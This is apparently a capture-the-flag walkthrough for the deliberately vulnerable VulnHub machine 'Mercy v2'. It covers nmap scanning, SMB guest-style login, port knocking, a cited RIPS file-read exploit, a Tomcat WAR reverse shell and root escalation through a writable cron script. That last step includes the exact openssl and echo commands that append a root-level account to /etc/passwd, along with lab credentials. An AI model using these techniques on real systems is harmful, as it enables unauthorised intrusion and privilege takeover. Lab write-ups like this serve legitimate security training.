you can download it here: https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

use nmap to discover the target:

1
nmap -p 1-65535 -T4 -v 192.168.227.0/24

1

port 80 is filtered, check port 8080 first.

2

it is a tomcat default page.

3

tried bruteforce its manager page but failed, tried some available exploits in metasploit framework also failed.

decided to do a thorough port scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-07 05:26 EDT
Nmap scan report for 192.168.227.155
Host is up (0.0011s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp filtered http
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP UIDL CAPA AUTH-RESP-CODE STLS PIPELINING RESP-CODES SASL
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: IDLE SASL-IR ID listed LOGIN-REFERRALS LITERAL+ post-login STARTTLS have OK more capabilities LOGINDISABLEDA0001 IMAP4rev1 ENABLE Pre-login
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:8E:4B:ED (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2019-06-07T17:27:16+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-07 05:27:16
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 1.09 ms 192.168.227.155

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.51 seconds

smb share(port 445) enabled.

4

tried login with username “qiu” and password “password” and got in.

found qiu.private\opensesame\config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]
UseSyslog

[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn

[closeHTTP]
sequence = 4,27391,159
seq_timeout = 100
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn

[openSSH]
sequence = 17301,28504,9999
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 9999,28504,17301
seq_timeout = 100
command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn

seems like some port knocking staff to open port 80.

5

okay, now port 80 is open.

6

found this. rips 0.53, which is a code audit tools

7

google for vulnerability and found this: https://www.exploit-db.com/exploits/18660

8

arbitrary local file read. So I can read the tomcat user configuration file and get the credential, then deploy war to getshell.

9

login to /manager/html with username “thisisasuperduperlonguser “and password “heartbreakisinevitable”

10

11

use msfvenom to generate a reverse shell and deploy. get a reverse shell.

12

can su to “fluffy” using password “freakishfluffybunny” found in the tomcat user configuration file.

walked around and found this

13

I guess this script is executed in every short time as hinted below

14

since the file owner is root, I guess it is under root’s crontab, if I modified the scripts by appending one line to the /etc/passwd, I would also gain root shell?

1
2
3
4
openssl passwd -1 -salt test test123 // get the hash for "test123"


echo "echo 'test:\$1\$test\$38ALrA6gUh5cdefeaknFf.:0:0:root:/root:/bin/bash' >> /etc/passwd" >> timeclock

wait for a while and see that there is an additional line in /etc/passwd as:

1
test:$1$test$38ALrA6gUh5cdefeaknFf.:0:0:root:/root:/bin/bash

then su test and login with password “test123”, get root shell.

15

and my guess was correct, the timeclock is executed every 3 minutes.

16